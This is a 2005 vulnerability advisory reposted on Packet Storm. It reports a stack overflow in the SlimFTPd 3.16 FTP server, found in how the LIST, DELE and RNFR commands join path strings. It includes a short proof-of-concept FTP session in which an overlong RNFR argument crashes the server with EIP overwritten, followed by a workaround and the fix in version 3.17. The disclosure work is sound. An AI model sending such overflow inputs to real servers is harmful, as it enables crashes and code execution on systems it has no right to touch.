exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SlimFTPd316.txt

SlimFTPd316.txt
Posted Jul 22, 2005
Authored by Raphael Rigo

SlimFTPd version 3.16 allows for arbitrary code execution due to an unchecked string concatenation that allows for a classic stack overflow.

tags | advisory, overflow, arbitrary, code execution
SHA-256 | 248142956dd1f27265ceec445dcd2c473686f9c9aab7558319b56e8cc7a709e0

SlimFTPd316.txt

Change Mirror Download
               Arbitrary code execution in SlimFTPd v3.16

discovered by Raphaƫl Rigo

Product: SlimFTPd by WhitSoft Development
Affected Version: 3.16 (verified), <=3.16 probably too
Not affected Version: 3.17
OS affected: All Win32
Risk: Critical
Remote Exploit: yes
URL: http://www.whitsoftdev.com/slimftpd/

Overview
========

SlimFTPd is a fully standards-compliant FTP server implementation with an
advanced virtual file system. It is extremely small, but don't let its file
size deceive you: SlimFTPd packs a lot of bang for the kilobyte. It is written
in pure Win32 C++ with no external dependencies and no messy installer.
SlimFTPd is a fully multi-threaded application that runs as a system service on
Windows 98/ME or Windows NT/2K/XP, and it comes with a tool to simplify its
installation or uninstallation as a system service. Once the service is
started, SlimFTPd runs quietly in the background. It reads its configuration
from a config file in the same folder as the executable, and it outputs all
activity to a log file in the same place. The virtual file system allows you
to mount any local drive or path to any virtual path on the server. This allows
you to have multiple local drives represented on the server's virtual file
system or just different folders from the same drive. SlimFTPd allows you to
set individual permissions for server paths. Open slimftpd.conf in your
favorite text editor to set up SlimFTPd's configuration. The format of
SlimFTPd's config file is similar to Apache Web Server's for those familiar
with Apache.

Vulnerability
=============

An unchecked string concatenation allows a classic stack overflow.

Details :
The handler for the LIST, DELE and RNFR commands builds a string by
concatenating the current directory with the requested dir/file.
The requested and current directory can occupy up to 512 bytes, as
the destination buffer, which can therefore be overflowed.
The minimal length for the current remote directory to allow
exploitation is 8 chars.

Risk : Critical
The attacker may execute arbitrary code with the privileges of the
user the server is running as.
This risk is mitigated by the need to be logged in.

Proof of concept :
ftp> open localhost
Connected to localhost.
220-SlimFTPd 3.16, by WhitSoft Development (www.whitsoftdev.com)
220-You are connecting from localhost:2687.
220 Proceed with login.
User (localhost:(none)) : bleh
331 Need password for user "bleh".
Password :
230 User "bleh" logged in.
ftp> cd 123456789
250 "/123456789" is now current directory.
ftp> quote RNFR 123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345
Connection closed.

SlimFTPd crashes at eip 0x35343332.

Workaround :
Disable List and Write rights.

Solution :
Update to v3.17

-----------------------------------------------------------------------

Acknowledgments
==============

Thanks to the developer for quick response and fix.

Timeline
========
2005-07-07 Discovery
2005-07-08 First attempt to contact developer
2005-07-08 Developer reply
2005-07-11 Fixed version 3.17 released
2005-07-21 Advisory published
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close